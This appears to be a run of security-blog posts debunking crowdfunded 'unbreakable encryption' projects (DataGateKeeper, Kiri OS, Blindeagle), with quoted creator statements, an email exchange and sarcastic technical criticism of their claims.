We’ve previously covered this campaign in several entries before, but with some level of elation, we’re happy to report that the individuals behind the MyDataAngel /DataGateKeeper KickStarter campaign have cancelled their project just a few hours before it was expected to fail.

However, it appears that they won’t go out without kicking and screaming and have thus issued a rebuttal directed at those of us who tweeted and blogged about them in a manner that was to their displeasure.

“It is not a field of a few acres of ground, but a cause, that we are defending, and whether we defeat the enemy in one battle, or by degrees, the consequences will be the same.” Thomas Paine, 1777

Dear DataGateKeeper Software Backers,

No truer words were ever spoken. As true in 1777, as it is nearly 240 years later.

You are true Data Angels; your foresight in the face of aggressive and salacious attacks from the fringe is a testament to your fortitude and an inspiration to us. You will have your DataGateKeeper. Our resolve to deliver to you the DataGateKeeper Total Data Protection Software™ and SafeDataZone™ has never been greater.

We are finalizing the release of the DataGateKeeper on the Windows platform, and the development and stress testing of the Android and Apple platforms.

We launched our Kickstarter campaign to test both our message and the market. Unfortunately, we did not gain perspective on either issue. A key driver for success on any crowdfunding platform is getting the word out on social media. On this matter, we failed you, as we elected to cancel all of our promotional efforts, nearly immediately. Why?

We felt this action was the most responsible avenue to take once the fringe quasi-InfoSec wannabe community began attacking you, our DataGateKeeper Backers. We have never seen anything like that and likely, no campaign has ever had Backers personally attacked for making a Pledge.

These miscreants did not Pledge for any Rewards, however, they used a loophole, in this platform to disrupt and gain access to you, our Backers, which is reprehensible. The twittidiots and their ilk even attacked our employees and supporters – all anonymously. We apologize to our DataGateKeeper Backers and Team for any offense or verbal attacks you sustained.

In addition, we had several “journalists” contact us to do a “story” for their “readers”. We also elected not to engage them for several reasons; the well had been poisoned, our message had been diluted, and their intentions and loss of objectivity had been made clear by their online social media activity.

During the campaign, we engaged these crypto-crazies in an effort to understand their boggle. As is typical of any engagement with flakes that hide behind anonymity, the 80/20 Rule was in full force. 80% of the twittidiots could not conjugate a response, while 20%, who did not hide behind their twitter account, proved to be helpful, and we had productive conversations. We thank them here.

What Did We Learn?

  • Controlling the message is important, however, controlling the environment for that message is critical. Today we will move to control both the message and the environment. We believe in the first amendment, however not at the expense of decorum, respect for others’ opinion and dignity.
  • Given the plethora of crowdfunding sites available in the market, the Kickstarter platform is likely not the best platform for software, absent a techie gadget connection or video game. Software clearly underperforms on this platform.

What are We Prepared to do for Our DataGateKeeper Software Backers?

  • We are going to complete our DataGateKeeper Total Data Security Software and make it available to you first for the price you Pledged and for the Reward you Backed. We are currently arranging to do this very thing.

DataGateKeeper Backers, you have our private email address, we look forward to continued communications. Please contact your Data Angel Team if you have any further questions.

It’s interesting that they quoted from Thomas Paine’s American Crisis, which is a series of pamphlets meant to encourage American colonists to support a war against Great Britain using deistic preference suggesting that they’ll win against the Crown. In the case of Raymond Talarico and his crew, the request for accountability is the real tyranny, and thus is definitely worth fighting a war against.

As one person put it to me: MyDataAngel believes that they’re the “founding fathers” of truly-secure encryption. If you have a problem with this, then you must hate America. Well, MyDataAngel, I guess that since I am Canadian and thus a subject of the Crown, I really am hellbent on this idea.

Why you actually failed

You waged a fierce and determined campaign against any kind of investigation or scrutiny. You made outrageous claims about your software’s functionality. You refused to answer any of the technical questions asked of you in earnest. You complained bitterly when, in the absence of technical content, we instead analyzed your staff’s backgrounds for plausible competence in the field of information security.  Information security is not a field that has much patience for secrecy, and you’re exactly why.

You claim that 20% of the respondents on Twitter were “helpful”. Of course, this can’t be backed up with data, because you because you’ve gone and made your account private. Fortunately, I am still following you, and can read a random sampling of these tweets–none of them seem to indicate that they were “helpful” at all.  They really are just calling you out on your nonsense.

You complain about the unwashed masses of anonymous “crypto-crazies”, nameless “twittidiots” (shouldn’t it be “twidiots”?), or unspecified members of the “fringe quasi-InfoSec wannabe community” attacking you via social media.  In my case, this is demonstrably untrue; I first wrote about MyDataAngel on my own personal blog, with my full real name in the page header and the URL.  I also wrote to you with my personal e-mail address, as I’ll discuss later.

You, meanwhile, really don’t like being identified. We’ve reached out to a number of your former business partners and none of them returned our e-mails. All we can find are community forum posts from people who work at a single-person company or press releases making wild claims about your product and a supposed partnership with another seemingly single-person company. One is left to wonder why a multi-billion dollar company hasn’t snatched your product up.

After being called out on your claims of “512 KB” encryption strength, you edited them to reflect something more plausible, yet made no attempt to explain why this change was made–going from claiming “512 KB” encryption back to just “512” without mentioning the word “bit”.  This calls into question whether you know what the number 512 is meant to measure, in this context.

There are other reasons to suspect that you don’t know anything about cryptography.  Here’s a tweet where you try to coyly hint at what encryption algorithm you’re using:


Truly bizarre to suggest that Huffman coding, a 1952 equation (which is almost a half-century before AES was ratified and supposedly “too old” by your standards) is encryption when in fact it’s compression, used as a basis for PKZIP, JPEG, GZIP, and MP3 file formats to name a few.

In a similar vein, before you took down your website, it was providing explanations about cryptography concepts plagiarized from various books and Wikipedia:


Whether or not you know what you’re doing with cryptography, you’ve clearly already gone ahead and built the Windows version of your encryption software. A demonstration copy was supposedly made available when it was still known as Centuri Cryptor. We can see in this YouTube video from when it was known as FileWarden that it was already working.


Since you clearly have a functional product already, it’s only natural that I’d want to test it!  As mentioned above, I reached out to you regarding a demonstration of your application. Here’s the e-mail exchange:

From: Colin Keigher
Sent: Friday, May 13, 2016 11:56 AM
Subject: Interested in a demo

Hi there,

I’d like a copy of your software to demo and test. Please let me know how I can review this.


Subject: RE: Interested in a demo
Date: Friday, May 13, 2016 11:59 AM
From: “Hack Me If You Can” <>
To: “‘Colin Keigher'”, <>


We respect anonymity so we won’t ask you for any identifying information
about who you are.

Having said that — We have two questions?

1. Would you please tell us a little about yourself.

2. Or recommend someone you think would take on this Challenge. We want to choose someone the community respects and trusts.

Back to all qualified entrants on May 16.

Your Data Angel Team

From: Colin Keigher
Sent: Friday, May 13, 2016 12:14 PM
To: Hack Me If You Can <>
Subject: RE: Interested in a demo

Hi there,

Thanks for getting back to me. I have some follow up questions.

1. What are you looking for here? I am a security engineer who runs his own company.
2. In what sense do you mean “someone the community respects and trusts”? What are your qualifiers?


Subject: RE: Interested in a demo
Date: Friday, May 13, 2016 1:08 PM
From: “HackMeIfYouCan” <>
To: “‘Colin Keigher'”
Copy: “‘Hack Me If You Can'” <>

Hi Colin,

We’ll do our due diligence, and, following, chose those parties whom represents the largest demo vis-a’-vis followers, trust and respect.

We believe this plan is likely the best practice for achieving our goal.

We are open to suggestions as to criteria, and welcome yours and the communities opinion on our selection criteria.

You Data Angel Team

Your last response suggests that you’ll be choosing yourself the parties you “trust” and “respect”. Concealing your encryption algorithm isn’t going to make it any more secure, and really is just going to attract more suspicion. If you want to have some level of credibility, you’re going to have to allow people to test your algorithm without being able to vet them, because you don’t get to vet the real attackers when they’re after your real customers’ data. If you had the confidence in your software that your advertising copy suggests, you’d gladly let me or anyone else publicly test it out with no restrictions beyond not sharing the software with others.

The information security community takes claims like yours seriously, which is why we have been so ardent in criticizing you. Documenting charlatans and bad organizations is a time-worn hobby for this community. You cannot expect to pull a fast one on us, because the tricks you’re attempting to pull are far from new.

We think the real reason why you insist on going for the crowd-funding model is that you know your claims given are nonsense and that nobody well-informed about your product would choose to spend money on it, much less trust it with important secrets. This is why you set the kickstarter goal at a piddly $20,000 USD to fund a team of nine people, and it’s why you would then pad out your total with a few high-dollar-value backers–because it lets you turn to potential investors and claim that there’s consumer interest in your product.

You close off stating that KickStarter was not the place to launch your project and that you’re going to look at other options; we’ll close off by suggesting that you do not.

DYC Studio posts an update on Kiri

Last week, we published details on Kiri, a project that promises to make you anonymous on the Internet with a $40 USD Raspberry Pi and some lifted code. On June 3rd, Taheer Jokhia posted an update on the KickStarter:

Closed Source GP2 License Issues

It has come to light that we will not be able to distribute our code as closed-source. Therefore we are announcing that Kiri OS will be open-source and made available to the public.

About Dyc Studio and some history on Kiri

Please note: Employees of Dyc Studio have chosen to stay anonymous for their own personal reasons, so they will not be named. Please respect this. 

Dyc Studio started as a design company in 2010. During that time the company was very small and not yet registered as the private limited company it is today and our managing director, Taheer, had begun learning the fundamentals of cyber security. About a year later Dyc Studio moved on to start producing websites and software for various companies at a very small scale. Over time (until 2015) the company grew, gained more clients and eventually became a registered company, still only with 2 employees; the director and a designer. As for Kiri OS, our director, Taheer began development on it in 2013 and has been slowly building it’s components since then.

It was only during the beginning of 2016 that Taheer decided that Kiri OS should be distributed to the world, however he knew it would not be complete for at least another 5 years. So he reached out to friends and family in search of help. He gained one extra developer who is experienced in cyber security to help out. In February 2016, the team had become 3 people; Taheer, another software engineer and a designer. It was then the team decided Kiri OS needs external funding to pay for the team to work on Kiri fulltime as well as hire extra help, so we began focusing on a Kickstarter campaign and put all development on standby until the team is able to work full-time on it.

I hope this clears things up for a lot of you.

You’d think that Taheer would have at least read the licence when going over this source code he was trying to lift for this Kiri project.

Based on a CV posted on one of DYC Studio’s websites from around 2012 (we have opted to not share a copy of this due to it revealing some personal information), there is no indication of an interest in cyber security, operating system development, or anything that would inspire some level of confidence in the project.

This is an excerpt from said CV:

Weirdly, the CV is shared between him and his former business partner. Being that said business partner does not appear to be involved any further and that Taheer has asked that we respect privacy for his anonymous (read: “probably fake”) employees, we won’t name him.

Taheer should also update his LinkedIn profile because so far I just see that he’s into marketing and web design:

Screen Shot 2016-06-05 at 22.20.58

We see software development, game development, and app development, but how about languages? How about cyber security? You updated your profile to state that you’re doing a KickStarter, but haven’t updated it to tell us more about your development past?

Also, when did DYC Studio start? 2011 or 2008? Your weird CV says 2011, your other LinkedIn profile says 2011, and yet your current one says 2008? Are you a Director or are you a Founder?

It also does appear that we’ve touched a nerve:

Screen Shot 2016-06-05 at 22.40.05

If you want to raise money for your lifted OS, you could at least try and lie better. You already engage in spamming as part of DYC Studio, so you’d think that you would have picked up a few tricks by now.

Please provide us with a copy of the source code to ease confusion.

Kiri - The Anonymous Computer -- Kicktraq Mini

Kickstop the Blind Ego

With permission from the original author, we are reposting details on a failed KickStarter project called “Blindeagle”. It was cancelled by its project creator on April 12th after only achieving less than 10% of its goal.

Blindeagle is asking for money for a product, a product that promises private and secure communication with anyone over the internet and wants 90,000EUR to do it. For an additional 920,000 EUR, they’ll even remake what RedPhone already does for free. With a pricetag like that, it better not just be useful but live up to every one of its promises. What are its promises, anyway?

The advertised unit is a keychain that plugs in through the headphone jack of a mobile device, meant to interact closed-source app to provide impenetrable crypto. This crypto is said to use a one-time pad (OTP) system. The design, photos, prototype, and social networking vibe feel all too similar to the vaporware you’d expect a San Francisco based startup of 5 college students to poorly slap together and unload to unsuspecting venture capital firms for a million in seed money, who later are forced to abandon the broken concept and cut their losses. But it’s not like that– these 5 college students are from Belgium!

The broken English consisting primarily of hypespeak and buzzwords is a bit difficult to extract hard data from, so building a critique of the supposedly infallible security model wasn’t cake. By focusing on the major claims only and not nitpicking about general hyperbole, we show this product for the fraud it really is — a broken security model rife with contradictions, in the best case simply dangerous for its users, and in the worst an intentional scam surrounded by lies.

Why be so hard on a kickstarter that will likely never meet its goals in the first place? Because this campaign masquerades as an infallible solution to a current global crisis on data privacy, capitalizing on people’s fears and ignorance while overpromising and dangerously underthinking a science that often means the difference between life and death. Cryptography is the backbone for all security on the internet, and doing it right has always been undeniably hard. If their team of expert cryptographers are working on this device, we’re prepared to give some leeway to explain themselves, open source it, and work on it over the years like Telegram was given a chance to do at first… except there is no team of cryptographers, not even a “math expert”. So who is the savior that will guide us through this privacy crisis?

No background in crypto

Meet David (no last name provided). With no crypto background and “now over 5 years of experience in Java, web and iOS/OS X development”, “he .. takes care of the technical side of blindeagle, from the website to the apps and including programming the servers and the external units”. Let’s not be too hard on David, he’s likely been suckered into this by a friend and is either too naive to realize the ramifications or is ignorant and being used as a fall guy by a scammer. Assuming he hasn’t singlehandedly broken the underlying security of everything due to human error, miscalculations, improper security model, or a complete and utter lack of proper crypto background or experience, we can move on to the message and leave the messenger be for now.


As quoted from their product homepage, using their device “guarantee[s] you total confidentiality and absolute security”. That’s quite a claim to make, especially since it’s impossible. Every legitimate cryptographic tool or product in the world is designed with an understanding that as time passes, the likelihood of its security being compromised increases exponentially; that vigilance, not a false promise of trust, is the backbone of true security. Security is not a fixed-state, it is an evolving process. Does Blindeagle understand that process? By asking us to trust their closed-source apps written entirely by David on closed-source devices manufactured by an unknown third-party supplier, the picture looks pretty grim. Despite several free, secure applications that do encryption “right” (XMPP+OTR, BitMessage, Tox), we’re to believe that we need a separate closed-source device. What does that device even do?

Magic box

The device purports to feed one-time Vernam cyphers from a pool stored in its memory directly to the mobile app. Properly implemented Vernam Ciphers (and OTP in general) can be extremely secure, but the difference between broken and sound cryptography is often in its implementation. While claiming it is infallible compared to email or other chat apps in terms of encryption, it fails to describe in any detail whatsoever how this particular implementation can’t be intercepted by a rogue app on a rooted phone, sniffed over the air via the device itself, or any number of potential attack vectors. That would take actual knowledge!

Weak magic

No, instead we are lead to believe that the infallible OTP key material preloaded onto the device at manufacturing has not been copied, tampered with in any way, and loaded in a secure way that could not be extracted through a simple buffer overflow or injection attack. OTP key material that was generated when you plug the device in might lead to secure keys, but trusting their third-party manufacturer presses the boundaries of what can be considered “secure”. Keys generated by the company could be stored and used to decrypt all the messages you use at any point in time. Even if the company wasn’t malicious, what’s to stop a malicious nation-state actor forcing them to hand over every single key they produce? Whilst some of this is protected by the plausible deniability given by a OTP system, they only provide 2GB of material. That is 2147483648 bytes of key material. Computers are incredibly fast. End users expecting a fast gaming experience from their cheap desktop may not realize it, but computers are designed to be fast for simple XOR operations. A computer could process all 2 gigabytes of the key material and break the message in probably a matter of minutes. Compare this to seed files used for real OTPs, which are often in the terabytes, to ensure an attacker could not load the seed into memory.

Powered by buzzwords

According to the copy, “the key existing in the external unit is generated using quantum phenomena”. This is buzzspeak for “a mirror sensor looks at light and makes a key based on the photo it takes”. While interesting in theory, theories that cryptographic security revolve around should be tested and proven before going into production. It goes on to guarantee that the keys in the device can only be used once, that it behaves as single use memory. Except, if, somebody copies the key data. Let’s go back to how the device plugs into the headphone port onto your device. Putting aside the logistics of getting a device like this to work on a computer without a combined headphone and microphone socket, what’s to stop a malicious app pretending to be the official app, reading in all of the key data, and then simply saving it to your local storage? There is no technical explanation provided by Blindeagle how this can be guaranteed aside from a brief introduction to “potting”.

The straw that broke the crypto’s back

Among the claims of perfect crypto is the use of “end to end encryption”, something by definition readable by only two-parties and is unbreakable unless the underlying crypto is broken or a key materializes. End-to-end crypto– if done right– is a good thing and Blindeagle would be silly not to include it as a main feature. But is Blindeagle truly end-to-end encrypted?

After data is encrypted using your Blindeagle device, it is sent to their closed-source proprietary servers in the EU. From that point, the data is “decrypt[ed] with the sender key followed by the instantaneous encryption with the receiver key, just before the destruction of the encryption keys”. If you are thinking to yourself, “isn’t that the definition of a middle-man?”, you’re likely more suitable to lead their team than poor David.

Blindeagle clearly advertises “no data is stored on our servers”, in addition to the “No data-retention” laws in Belgium. Despite being empty and unprovable claims, we have learned from experience and leaks that neither nation-state actors nor hackers need permission, nor do they follow laws when hijacking, injecting, seizing or bugging servers for their own malicious purposes. By purposely introducing a middle-man into their transport protocol, they cannot make the claim with absolute certainty that no data will be stored.


Blindeagle’s security model does not meet the requirements of even the most basic security theory, its advertised implementation is dangerous, and its claims are contradictory, misleading and at times downright lies. At this point it’d be preferable if it ends up having been a non-delivering scam.

Written mostly by sn0wmonster from the ##crypto IRC on freenode, with some technical input from SunDwarf.

DataGateKeeper (aka is no longer “impenetrable” but now “engineered”

If you look at the original KickStater (via this link), you’ll have seen it showing the following:

Screen Shot 2016-06-03 at 13.11.06

Now it has been edited to show that it is no longer “impenetrable”, but “engineered”:

Screen Shot 2016-06-03 at 13.10.55

There have been several other changes to the KickStarter as well.

This was the original text with their take on the “backdoors” in AES:

In the late 1990’s, AES, while under ‘well-intentioned’ government oversight, somehow, a ‘back-door’ found its way into this ‘approved’ data security solution, — as has been widely reported. The unintended consequences of this back-door allows for complete access to your data, without your permission, to data monitoring, data-mining and active eavesdropping.  Effectively, voiding your right to privacy and confidently. So common is this practice it has a name: Active Snooping.

Now it has been changed to “flaws”:

In the late 1990’s, while under ‘well-intentioned’ government oversight, flaws found their way into this ‘approved’ data security solution, — as has been widely reported (see, notes below). The unintended consequences of these flaws allows for complete access to your private and confidential data, without your permission, promoting underground data monitoring, data-mining and active eavesdropping. So common is this practice it has a name: Active Snooping.

This paragraph has been removed:

Simply, ‘the other guys’ use standard SSL (Secure Sockets Layer), and the failing AES, in an attempt to secure your Privacy & Confidentiality. The same data security hackers took advantage of in the breach of Target, Home Depot, iCloud, Sony, Anthem…you get the idea. You Deserve Better.

What replaced it was the last sentence.

In an attempt to make themselves appear as if they’re trying to be more open, they decide to remove the tripe about the levels of encryption and replace it with some story about their plans to improve the software.

The R&D Plan

To build the DataGateKeeper, we disassembled and reverse engineered several automated password cracking software programs. This was to understand their procedural sequence and methodologies related to code acquisition, code cracking, or as it is known, hashed access to code and source. Additionally, we decompiled these programs to gain insight on hacking software’s proclivity to exploit weakness in cycle rates, including their integrated and powerful automation multipliers, and natural GPU processor affinity. Following months research we had what we needed to protect you.

This seems like complete nonsense. If you had read the previous expose we’ve done on this KickStarter, this project has been floating about for years and has changed hands a handful of times. At no point have we seen any evidence that they’ve spent any time researching any automated password cracking applications.

Furthermore, that second last sentence? It doesn’t make any sense and reads like something akin to out of Reddit’s VX Junkies. Much of the above existed when it was just labeled as “The Math” which is no longer on the page.

Validation Plan

Now that our cryptographic module is complete, we plan to submit our DataGateKeeper module for independent validation the sooner of; official final publication of the NIST pronouncement on the Federal Register seeking comment to portions of 19790 (deemed 19790:2014), to update 140-2, or, the official abandonment of such update. We plan to use Underwriters Laboratory (UL), however, there are several certified laboratories performing FIPS certification. Following validation and patent (currently, we rely on trade secret to protect our algorithm) we will release our algorithm to the select members of the cryptographic community for further development and analysis under a very specific set of guidelines which we will solely determine.

Oh. There’s a patent-pending for this or are you still keeping this close to your chest? I did a cursory search on Google Patents using various names and keywords relating to this project and nothing has come up for anything relating to this encryption suite of yours.

You tend to rag on AES encryption here yet mention nothing else. If you have looked at the 140-2 validation list, you’ll notice that you’re facing an uphill battle to get your fancy, never-before-seen cipher validated.

Open Source

Before you ask or comment, we have no plans to release any portion or portions of our code as Open Source. Those of you in the software community who are Open Source advocates are welcome to invest your time, effort and capital to develop a competitive data security solution and release it as Open Source…we encourage it. Go getem’ champs.

I’m certain that if you ever release this software that we’ll figure out how to decipher it without much effort.

Vulnerability Coordination & Bug Bounty Platform

We are currently coordinating efforts to provide the DataGateKeeper under strict guidelines to one or more vulnerability coordination platforms, such as Hackerone. Our plan includes inviting, predetermined, preselected software testers to leverage their skills and creativity to undertake periodic reviews of our data security solution to inspect for vulnerabilities and assist us future planning and software updates. We will use this form of Bug Bounty Platform to provide independent testers a voice to aid us in future developments and testing before updates are published.

Don’t see you listed on HackerOne yet.

They’ve also changed who they’re going to give part of the proceeds post KickStarter to. Here’s the original statement: is proudly participating in Kicking It Forward Initiative, promising to pledge 5% of its post-release profit to other Kickstarter projects.

And now they’re just going to give their software to an organization of a backer’s choice instead of money to Kicking It Forward:

When you visit our website you will see we plan to make available, two versions of our DataGateKeeper software. One available here on Kickstarter, our Civilian version, at 512-bit, and a second 768-bit version for our First Responders, Active Duty and retired Military personnel. We designed the 768-bit version of the DataGateKeeper for those individuals who protect us and run into danger so we don’t have to.

As a thank you to you and the Kickstarter community for supporting us, for every reward pledge we receive for our DataGateKeeper software during this campaign. We will award a complimentary lifetime subscription of our 768-bit First Responder DataGateKeeper Software including 500GB of our SafeDataZone in your name to one of the organizations listed in our post campaign survey, tending to the people who protect our lives and our liberty. They should not have to worry about data theft when their mission is far greater.

Support “are” troops right? Nothing says patriotism like shoving bogus crapware on to veterans.

In a (not so) surprising move, they’ve went and removed any details about themselves from the KickStarter minus a few quips remaining in the bottom text. For posterity, here’s a mirrored copy:


Again, these people are:

  • Raymond Talarico, CEO
  • Debra Towsley, President (and wife of Raymond)
  • Frank Ruppen, Chief Strategy Office
  • Joshua Noel, Creative Director
  • Loreena Stanga, Cat Herder & Code Management
  • Jensen Dillard, Data Angel Host
  • Steve Talbot, Advisory Board
  • Chad Thilborger, Data Angel & Host
  • David Smith, Advisory Board
  • Frankie, Data Angel & Celebrity

If you’re trying to make yourselves seem more legitimate, removing details about who is on your team late in the game is not a way to do it.

DataGateKeeper: The FIRST Impenetrable Anti-Hacking Software -- Kicktraq Mini

If this makes it to the $20,000 by the end of the campaign, they’ve had someone pump it.